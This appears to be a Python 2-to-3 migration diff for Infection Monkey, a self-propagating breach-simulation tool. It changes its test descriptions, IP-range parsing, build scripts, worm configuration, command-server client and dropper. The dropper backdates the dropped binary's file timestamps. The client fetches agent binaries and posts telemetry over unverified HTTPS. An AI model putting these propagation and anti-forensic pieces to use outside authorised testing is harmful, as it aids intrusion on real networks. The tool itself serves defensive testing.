         PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
@@ -109,7 +114,8 @@ TESTS_MAP = {
     TEST_SCHEDULED_EXECUTION: {
         TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
-            STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
+            STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
+                           "software.",
             STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
         },
         PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,

@@ -117,38 +123,42 @@ TESTS_MAP = {
         POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
     },
     TEST_DATA_ENDPOINT_ELASTIC: {
-        TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to ElasticSearch instances.",
+        TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
-            STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
+            STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
+                           "that indicate attempts to access them. "
         },
         PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
         PILLARS_KEY: [DATA],
         POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
     },
     TEST_DATA_ENDPOINT_HTTP: {
-        TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to HTTP servers.",
+        TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
-            STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
+            STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
+                           "attempts to access them. "
         },
         PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
         PILLARS_KEY: [DATA],
         POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
     },
     TEST_TUNNELING: {
-        TEST_EXPLANATION_KEY: u"The Monkey tried to tunnel traffic using other monkeys.",
+        TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
-            STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
+            STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
+                           "restrict them. "
        },
         PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
         PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
         POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
     },
     TEST_COMMUNICATE_AS_NEW_USER: {
-        TEST_EXPLANATION_KEY: u"The Monkey tried to create a new user and communicate with the internet from it.",
+        TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
-            STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
+            STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
+                           "restrict them to MAC only.",
             STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
         },
         PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,

@@ -184,7 +194,7 @@ def populate_mappings():

 def populate_pillars_to_tests():
     for pillar in PILLARS:
-        for test, test_info in TESTS_MAP.items():
+        for test, test_info in list(TESTS_MAP.items()):
             if pillar in test_info[PILLARS_KEY]:
                 PILLARS_TO_TESTS[pillar].append(test)

@@ -192,12 +202,12 @@ def populate_pillars_to_tests():
 def populate_principles_to_tests():
     for single_principle in PRINCIPLES:
         PRINCIPLES_TO_TESTS[single_principle] = []
-    for test, test_info in TESTS_MAP.items():
+    for test, test_info in list(TESTS_MAP.items()):
         PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)


 def populate_principles_to_pillars():
-    for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
+    for principle, principle_tests in list(PRINCIPLES_TO_TESTS.items()):
         principles_pillars = set()
         for test in principle_tests:
             for pillar in TESTS_MAP[test][PILLARS_KEY]:
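The `populate_*` functions above all build inverse indexes over `TESTS_MAP`: walk the map once and append each test under every pillar or principle key it mentions. A reduced sketch of that move (the two-entry `TESTS_MAP` below is invented; `defaultdict` stands in for the module's pre-initialized dicts):

```python
from collections import defaultdict

PILLARS_KEY = "pillars"
PRINCIPLE_KEY = "principle_key"

# Invented two-test map, same shape as the real TESTS_MAP
TESTS_MAP = {
    "segmentation": {PILLARS_KEY: ["Networks"], PRINCIPLE_KEY: "segmentation"},
    "tunneling": {PILLARS_KEY: ["Networks", "Visibility & Analytics"], PRINCIPLE_KEY: "network_policies"},
}

PILLARS_TO_TESTS = defaultdict(list)
PRINCIPLES_TO_TESTS = defaultdict(list)

# One pass builds both inverse mappings
for test, test_info in TESTS_MAP.items():
    for pillar in test_info[PILLARS_KEY]:
        PILLARS_TO_TESTS[pillar].append(test)
    PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)

print(dict(PILLARS_TO_TESTS))
print(dict(PRINCIPLES_TO_TESTS))
```

The `list(...)` wrappers around `.items()` in the diff are 2to3 artifacts; plain iteration works the same when the dicts aren't mutated mid-loop.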


@@ -4,7 +4,6 @@ import struct
 from abc import ABCMeta, abstractmethod

 import ipaddress
-from six import text_type

 import logging

 __author__ = 'itamar'

@@ -12,9 +11,7 @@ __author__ = 'itamar'
 LOG = logging.getLogger(__name__)


-class NetworkRange(object):
-    __metaclass__ = ABCMeta
+class NetworkRange(object, metaclass=ABCMeta):

     def __init__(self, shuffle=True):
         self._shuffle = shuffle

@@ -47,9 +44,9 @@ class NetworkRange(object):
     @staticmethod
     def get_range_obj(address_str):
-        address_str = address_str.strip()
         if not address_str:  # Empty string
             return None
+        address_str = address_str.strip()
         if NetworkRange.check_if_range(address_str):
             return IpRange(ip_range=address_str)
         if -1 != address_str.find('/'):

@@ -62,7 +59,7 @@ class NetworkRange(object):
             ips = address_str.split('-')
             try:
                 ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
-            except ValueError as e:
+            except ValueError:
                 return False
             return True
         return False

@@ -80,7 +77,7 @@ class CidrRange(NetworkRange):
     def __init__(self, cidr_range, shuffle=True):
         super(CidrRange, self).__init__(shuffle=shuffle)
         self._cidr_range = cidr_range.strip()
-        self._ip_network = ipaddress.ip_network(text_type(self._cidr_range), strict=False)
+        self._ip_network = ipaddress.ip_network(str(self._cidr_range), strict=False)

     def __repr__(self):
         return "<CidrRange %s>" % (self._cidr_range,)

@@ -119,7 +116,7 @@ class IpRange(NetworkRange):
         return self._lower_end_ip_num <= self._ip_to_number(ip_address) <= self._higher_end_ip_num

     def _get_range(self):
-        return range(self._lower_end_ip_num, self._higher_end_ip_num + 1)
+        return list(range(self._lower_end_ip_num, self._higher_end_ip_num + 1))


 class SingleIpRange(NetworkRange):

@@ -153,30 +150,26 @@ class SingleIpRange(NetworkRange):
         return self._ip_address

     @staticmethod
-    def string_to_host(string):
+    def string_to_host(string_):
         """
         Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
-        :param string: String that was entered in "Scan IP/subnet list"
+        :param string_: String that was entered in "Scan IP/subnet list"
         :return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
         """
         # The most common use case is to enter ip/range into "Scan IP/subnet list"
         domain_name = ''

-        # Make sure to have unicode string
-        user_input = string.decode('utf-8', 'ignore')
-
         # Try casting user's input as IP
         try:
-            ip = ipaddress.ip_address(user_input).exploded
+            ip = ipaddress.ip_address(string_).exploded
         except ValueError:
             # Exception means that it's a domain name
             try:
-                ip = socket.gethostbyname(string)
-                domain_name = string
+                ip = socket.gethostbyname(string_)
+                domain_name = string_
             except socket.error:
                 LOG.error("Your specified host: {} is not found as a domain name and"
-                          " it's not an IP address".format(string))
-                return None, string
+                          " it's not an IP address".format(string_))
+                return None, string_
-        # If a string was entered instead of IP we presume that it was domain name and translate it
+        # If a string_ was entered instead of IP we presume that it was domain name and translate it
         return ip, domain_name
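`string_to_host` hinges on one trick: try `ipaddress.ip_address` first, and treat a `ValueError` as "this must be a hostname", only then falling back to DNS. The classification step is easy to isolate (no DNS needed):

```python
import ipaddress


def looks_like_ip(s):
    """True if s parses as an IPv4/IPv6 literal, False if it must be a hostname."""
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False


print(looks_like_ip("192.168.55.1"))    # True
print(looks_like_ip("www.google.com"))  # False
```

This is also why the Python 3 version could delete the `.decode('utf-8', 'ignore')` line: `ipaddress.ip_address` accepts `str` directly.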


@@ -1,4 +1,4 @@
-from common.network.network_range import *
+from common.network.network_range import CidrRange
 from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
 from monkey_island.cc.testing.IslandTestCase import IslandTestCase

@@ -11,20 +11,20 @@ class TestSegmentationUtils(IslandTestCase):
         # IP not in both
         self.assertIsNone(get_ip_in_src_and_not_in_dst(
-            [text_type("3.3.3.3"), text_type("4.4.4.4")], source, target
+            ["3.3.3.3", "4.4.4.4"], source, target
         ))
         # IP not in source, in target
         self.assertIsNone(get_ip_in_src_and_not_in_dst(
-            [text_type("2.2.2.2")], source, target
+            ["2.2.2.2"], source, target
         ))
         # IP in source, not in target
         self.assertIsNotNone(get_ip_in_src_and_not_in_dst(
-            [text_type("8.8.8.8"), text_type("1.1.1.1")], source, target
+            ["8.8.8.8", "1.1.1.1"], source, target
         ))
         # IP in both subnets
         self.assertIsNone(get_ip_in_src_and_not_in_dst(
-            [text_type("8.8.8.8"), text_type("1.1.1.1")], source, source
+            ["8.8.8.8", "1.1.1.1"], source, source
         ))
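The utility under test returns an IP that sits inside the source subnet but outside the target subnet, which is the evidence of cross-segment reachability. A self-contained sketch of that check (assumption: the real function takes the project's NetworkRange objects; plain `ipaddress` types stand in here):

```python
import ipaddress


def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
    """Return the first IP inside source_subnet but outside target_subnet, else None."""
    for ip in ip_addresses:
        addr = ipaddress.ip_address(ip)
        if addr in source_subnet and addr not in target_subnet:
            return ip
    return None


source = ipaddress.ip_network("1.1.1.0/24")
target = ipaddress.ip_network("2.2.2.0/24")
print(get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, target))  # 1.1.1.1
print(get_ip_in_src_and_not_in_dst(["2.2.2.2"], source, target))             # None
```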


@@ -1,10 +1,10 @@
 # abstract, static method decorator
+# noinspection PyPep8Naming
 class abstractstatic(staticmethod):
     __slots__ = ()

     def __init__(self, function):
         super(abstractstatic, self).__init__(function)
         function.__isabstractmethod__ = True

     __isabstractmethod__ = True


@@ -12,8 +12,8 @@ class MongoUtils:

     @staticmethod
     def fix_obj_for_mongo(o):
-        if type(o) == dict:
-            return dict([(k, MongoUtils.fix_obj_for_mongo(v)) for k, v in o.iteritems()])
+        if isinstance(o, dict):
+            return dict([(k, MongoUtils.fix_obj_for_mongo(v)) for k, v in list(o.items())])

         elif type(o) in (list, tuple):
             return [MongoUtils.fix_obj_for_mongo(i) for i in o]

@@ -21,7 +21,7 @@ class MongoUtils:
         elif type(o) in (int, float, bool):
             return o

-        elif type(o) in (str, unicode):
+        elif isinstance(o, str):
             # mongo dosn't like unprintable chars, so we use repr :/
             return repr(o)

@@ -80,4 +80,3 @@ class MongoUtils:
                 continue

         return row


@ -1,4 +1,4 @@
import _winreg import winreg
from common.utils.mongo_utils import MongoUtils from common.utils.mongo_utils import MongoUtils
@ -12,11 +12,11 @@ class RegUtils:
pass pass
@staticmethod @staticmethod
def get_reg_key(subkey_path, store=_winreg.HKEY_LOCAL_MACHINE): def get_reg_key(subkey_path, store=winreg.HKEY_LOCAL_MACHINE):
key = _winreg.ConnectRegistry(None, store) key = winreg.ConnectRegistry(None, store)
subkey = _winreg.OpenKey(key, subkey_path) subkey = winreg.OpenKey(key, subkey_path)
d = dict([_winreg.EnumValue(subkey, i)[:2] for i in xrange(_winreg.QueryInfoKey(subkey)[0])]) d = dict([winreg.EnumValue(subkey, i)[:2] for i in range(winreg.QueryInfoKey(subkey)[0])])
d = MongoUtils.fix_obj_for_mongo(d) d = MongoUtils.fix_obj_for_mongo(d)
subkey.Close() subkey.Close()


@ -1,6 +1,6 @@
import wmi import wmi
from mongo_utils import MongoUtils from .mongo_utils import MongoUtils
__author__ = 'maor.rayzin' __author__ = 'maor.rayzin'

monkey/common/version.py (new file, +25 lines)

@ -0,0 +1,25 @@
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for details).
import argparse
from pathlib import Path
MAJOR = "1"
MINOR = "8"
PATCH = "0"
build_file_path = Path(__file__).parent.joinpath("BUILD")
with open(build_file_path, "r") as build_file:
BUILD = build_file.read()
def get_version(build=BUILD):
return f"{MAJOR}.{MINOR}.{PATCH}+{build}"
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str)
args = parser.parse_args()
print(get_version(args.build))
if __name__ == '__main__':
print_version()
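The version string is the SemVer core plus a `+build` local segment, as permitted by PEP 440. A minimal sketch of the formatting, assuming the BUILD file contains `94` (the build value here is illustrative):

```python
MAJOR = "1"
MINOR = "8"
PATCH = "0"

def get_version(build="94"):
    # SemVer-style core plus a "+build" local segment, e.g. "1.8.0+94"
    return f"{MAJOR}.{MINOR}.{PATCH}+{build}"

print(get_version())       # → 1.8.0+94
print(get_version("dev"))  # → 1.8.0+dev
```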


@ -1,4 +1,4 @@
import infection_monkey.main from infection_monkey.main import main
if "__main__" == __name__: if "__main__" == __name__:
infection_monkey.main.main() main()


@ -1,2 +1,17 @@
#!/bin/bash #!/bin/bash
# Allow custom build ID
# If the first argument is not empty...
if [[ -n "$1" ]]
then
# Validate argument is a valid build string
if [[ "$1" =~ ^[\da-zA-Z]*$ ]]
then
# And put it in the BUILD file
echo "$1" > ../common/BUILD
else
echo "Build ID $1 invalid!"
fi
fi
pyinstaller -F --log-level=DEBUG --clean monkey.spec pyinstaller -F --log-level=DEBUG --clean monkey.spec


@ -1 +1,12 @@
REM Check if build ID was passed to the build script.
if "%1"=="" GOTO START_BUILD
REM Validate build ID
echo %1|findstr /r "^[0-9a-zA-Z]*$"
if %errorlevel% neq 0 (exit /b %errorlevel%)
REM replace build ID
echo %1> ../common/BUILD
:START_BUILD
pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec


@ -1,12 +1,10 @@
import hashlib import hashlib
import os
import json import json
import os
import sys import sys
import types
import uuid import uuid
from abc import ABCMeta from abc import ABCMeta
from itertools import product from itertools import product
import importlib
__author__ = 'itamar' __author__ = 'itamar'
@ -14,36 +12,24 @@ GUID = str(uuid.getnode())
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin') EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin')
SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list"] SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list", "exploit_ssh_keys"]
HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden" HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"
class Configuration(object): class Configuration(object):
def from_kv(self, formatted_data): def from_kv(self, formatted_data):
# now we won't work at <2.7 for sure
network_import = importlib.import_module('infection_monkey.network')
exploit_import = importlib.import_module('infection_monkey.exploit')
unknown_items = [] unknown_items = []
for key, value in formatted_data.items(): for key, value in list(formatted_data.items()):
if key.startswith('_'): if key.startswith('_'):
continue continue
if key in ["name", "id", "current_server"]: if key in ["name", "id", "current_server"]:
continue continue
if self._depth_from_commandline and key == "depth": if self._depth_from_commandline and key == "depth":
continue continue
# handle in cases if hasattr(self, key):
if key == 'finger_classes': setattr(self, key, value)
class_objects = [getattr(network_import, val) for val in value]
setattr(self, key, class_objects)
elif key == 'exploiter_classes':
class_objects = [getattr(exploit_import, val) for val in value]
setattr(self, key, class_objects)
else: else:
if hasattr(self, key): unknown_items.append(key)
setattr(self, key, value)
else:
unknown_items.append(key)
return unknown_items return unknown_items
def from_json(self, json_data): def from_json(self, json_data):
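The rewritten `from_kv` drops the `finger_classes`/`exploiter_classes` special cases and relies purely on reflection against class-level defaults. A trimmed sketch of the pattern (the attribute names are illustrative):

```python
class Configuration:
    # class-level defaults, in the style of WormConfiguration
    depth = 2
    alive = True
    victims_max_find = 100

    def from_kv(self, formatted_data):
        """Copy known keys onto the instance; collect unknown ones."""
        unknown_items = []
        for key, value in formatted_data.items():
            if key.startswith('_') or key in ("name", "id", "current_server"):
                continue
            if hasattr(self, key):
                setattr(self, key, value)
            else:
                unknown_items.append(key)
        return unknown_items

config = Configuration()
unknown = config.from_kv({"depth": 5, "no_such_option": 1, "id": "x"})
print(config.depth, unknown)  # → 5 ['no_such_option']
```

Note that `setattr` shadows the class default on the instance only, so other `Configuration` instances keep the original values.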
@ -74,7 +60,7 @@ class Configuration(object):
val_type = type(value) val_type = type(value)
if val_type is types.FunctionType or val_type is types.MethodType: if callable(value):
continue continue
if val_type in (type, ABCMeta): if val_type in (type, ABCMeta):
@ -139,6 +125,7 @@ class Configuration(object):
finger_classes = [] finger_classes = []
exploiter_classes = [] exploiter_classes = []
system_info_collectors_classes = []
# how many victims to look for in a single scan iteration # how many victims to look for in a single scan iteration
victims_max_find = 100 victims_max_find = 100
@ -287,7 +274,7 @@ class Configuration(object):
:param sensitive_data: the data to hash. :param sensitive_data: the data to hash.
:return: the hashed data. :return: the hashed data.
""" """
password_hashed = hashlib.sha512(sensitive_data).hexdigest() password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
return password_hashed return password_hashed
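In Python 3, `hashlib` accepts only bytes, hence the added `.encode()`. A self-contained sketch of the hashing helper:

```python
import hashlib

def hash_sensitive_data(sensitive_data):
    # hashlib digests operate on bytes, so str input must be encoded first
    return hashlib.sha512(sensitive_data.encode()).hexdigest()

digest = hash_sensitive_data("Password1!")
print(len(digest))  # → 128 (sha512 produces 64 bytes = 128 hex chars)
```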


@ -9,7 +9,7 @@ from requests.exceptions import ConnectionError
import infection_monkey.monkeyfs as monkeyfs import infection_monkey.monkeyfs as monkeyfs
import infection_monkey.tunnel as tunnel import infection_monkey.tunnel as tunnel
from infection_monkey.config import WormConfiguration, GUID from infection_monkey.config import WormConfiguration, GUID
from infection_monkey.network.info import local_ips, check_internet_access, TIMEOUT from infection_monkey.network.info import local_ips, check_internet_access
from infection_monkey.transport.http import HTTPConnectProxy from infection_monkey.transport.http import HTTPConnectProxy
from infection_monkey.transport.tcp import TcpProxy from infection_monkey.transport.tcp import TcpProxy
@ -53,7 +53,7 @@ class ControlClient(object):
if ControlClient.proxies: if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https') monkey['tunnel'] = ControlClient.proxies.get('https')
requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(monkey), data=json.dumps(monkey),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
@ -76,7 +76,7 @@ class ControlClient(object):
if ControlClient.proxies: if ControlClient.proxies:
debug_message += " through proxies: %s" % ControlClient.proxies debug_message += " through proxies: %s" % ControlClient.proxies
LOG.debug(debug_message) LOG.debug(debug_message)
requests.get("https://%s/api?action=is-up" % (server,), requests.get("https://%s/api?action=is-up" % (server,), # noqa: DUO123
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
timeout=TIMEOUT_IN_SECONDS) timeout=TIMEOUT_IN_SECONDS)
@ -85,7 +85,7 @@ class ControlClient(object):
except ConnectionError as exc: except ConnectionError as exc:
current_server = "" current_server = ""
LOG.warn("Error connecting to control server %s: %s", server, exc) LOG.warning("Error connecting to control server %s: %s", server, exc)
if current_server: if current_server:
return True return True
@ -112,14 +112,14 @@ class ControlClient(object):
monkey = {} monkey = {}
if ControlClient.proxies: if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https') monkey['tunnel'] = ControlClient.proxies.get('https')
reply = requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps(monkey), data=json.dumps(monkey),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
return {} return {}
@staticmethod @staticmethod
@ -129,14 +129,14 @@ class ControlClient(object):
return return
try: try:
telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data} telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data}
reply = requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry), data=json.dumps(telemetry),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
@staticmethod @staticmethod
def send_log(log): def send_log(log):
@ -144,27 +144,27 @@ class ControlClient(object):
return return
try: try:
telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)} telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)}
reply = requests.post("https://%s/api/log" % (WormConfiguration.current_server,), requests.post("https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry), data=json.dumps(telemetry),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
@staticmethod @staticmethod
def load_control_config(): def load_control_config():
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return return
try: try:
reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
return return
try: try:
@ -185,13 +185,13 @@ class ControlClient(object):
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return return
try: try:
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({'config_error': True}), data=json.dumps({'config_error': True}),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", WormConfiguration.current_server, exc) LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc)
return {} return {}
@staticmethod @staticmethod
@ -247,7 +247,7 @@ class ControlClient(object):
if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)): if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)):
return dest_file return dest_file
else: else:
download = requests.get("https://%s/api/monkey/download/%s" % download = requests.get("https://%s/api/monkey/download/%s" % # noqa: DUO123
(WormConfiguration.current_server, filename), (WormConfiguration.current_server, filename),
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
@ -261,8 +261,8 @@ class ControlClient(object):
return dest_file return dest_file
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
@staticmethod @staticmethod
def get_monkey_exe_filename_and_size_by_host(host): def get_monkey_exe_filename_and_size_by_host(host):
@ -273,7 +273,7 @@ class ControlClient(object):
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return None, None return None, None
try: try:
reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(host_dict), data=json.dumps(host_dict),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, proxies=ControlClient.proxies) verify=False, proxies=ControlClient.proxies)
@ -288,8 +288,8 @@ class ControlClient(object):
return None, None return None, None
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
return None, None return None, None
@ -304,7 +304,7 @@ class ControlClient(object):
try: try:
target_addr, target_port = my_proxy.split(':', 1) target_addr, target_port = my_proxy.split(':', 1)
target_port = int(target_port) target_port = int(target_port)
except: except ValueError:
return None return None
else: else:
proxy_class = HTTPConnectProxy proxy_class = HTTPConnectProxy
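Narrowing the bare `except` to `ValueError` still covers both failure modes of the parse: a missing colon (tuple-unpack error) and a non-numeric port (`int` conversion error). A sketch of the pattern:

```python
def parse_proxy(my_proxy):
    """Split 'host:port' into (host, int(port)); return None on malformed input."""
    try:
        target_addr, target_port = my_proxy.split(':', 1)
        return target_addr, int(target_port)
    except ValueError:  # no ':' separator, or port is not an integer
        return None

print(parse_proxy("10.0.0.1:8080"))  # → ('10.0.0.1', 8080)
print(parse_proxy("not-a-proxy"))    # → None
```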
@ -315,7 +315,7 @@ class ControlClient(object):
@staticmethod @staticmethod
def get_pba_file(filename): def get_pba_file(filename):
try: try:
return requests.get(PBA_FILE_DOWNLOAD % return requests.get(PBA_FILE_DOWNLOAD % # noqa: DUO123
(WormConfiguration.current_server, filename), (WormConfiguration.current_server, filename),
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)


@ -26,7 +26,8 @@ else:
try: try:
WindowsError WindowsError
except NameError: except NameError:
WindowsError = None # noinspection PyShadowingBuiltins
WindowsError = IOError
__author__ = 'itamar' __author__ = 'itamar'
@ -103,17 +104,17 @@ class MonkeyDrops(object):
dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux
try: try:
ref_stat = os.stat(dropper_date_reference_path) ref_stat = os.stat(dropper_date_reference_path)
except OSError as exc: except OSError:
LOG.warn("Cannot set reference date using '%s', file not found", LOG.warning("Cannot set reference date using '%s', file not found",
dropper_date_reference_path) dropper_date_reference_path)
else: else:
try: try:
os.utime(self._config['destination_path'], os.utime(self._config['destination_path'],
(ref_stat.st_atime, ref_stat.st_mtime)) (ref_stat.st_atime, ref_stat.st_mtime))
except: except OSError:
LOG.warn("Cannot set reference date to destination file") LOG.warning("Cannot set reference date to destination file")
monkey_options =\ monkey_options = \
build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth) build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth)
if OperatingSystem.Windows == SystemInfoCollector.get_os(): if OperatingSystem.Windows == SystemInfoCollector.get_os():
@ -135,7 +136,7 @@ class MonkeyDrops(object):
time.sleep(3) time.sleep(3)
if monkey_process.poll() is not None: if monkey_process.poll() is not None:
LOG.warn("Seems like monkey died too soon") LOG.warning("Seems like monkey died too soon")
def cleanup(self): def cleanup(self):
try: try:

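The reference-date logic above copies a trusted system file's timestamps onto the dropped binary. A portable sketch of the same `os.stat`/`os.utime` pattern, demonstrated with temp files rather than real dropper paths:

```python
import os
import tempfile

def copy_timestamps(reference_path, destination_path):
    """Give destination_path the same access/modification times as reference_path."""
    ref_stat = os.stat(reference_path)
    os.utime(destination_path, (ref_stat.st_atime, ref_stat.st_mtime))

# demo: pin the reference file's times, then copy them onto another file
ref = tempfile.NamedTemporaryFile(delete=False); ref.close()
dst = tempfile.NamedTemporaryFile(delete=False); dst.close()
os.utime(ref.name, (1000000000, 1000000000))
copy_timestamps(ref.name, dst.name)
print(int(os.stat(dst.name).st_mtime))  # → 1000000000
```

Both `os.stat` and `os.utime` raise `OSError` on missing files, which is why the dropper narrows its handlers to that type.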

@ -1,107 +1,109 @@
{ {
"should_exploit": true, "should_exploit": true,
"command_servers": [ "command_servers": [
"192.0.2.0:5000" "192.0.2.0:5000"
], ],
"internet_services": [ "internet_services": [
"monkey.guardicore.com", "monkey.guardicore.com",
"www.google.com" "www.google.com"
], ],
"keep_tunnel_open_time": 60, "keep_tunnel_open_time": 60,
"subnet_scan_list": [ "subnet_scan_list": [
], ],
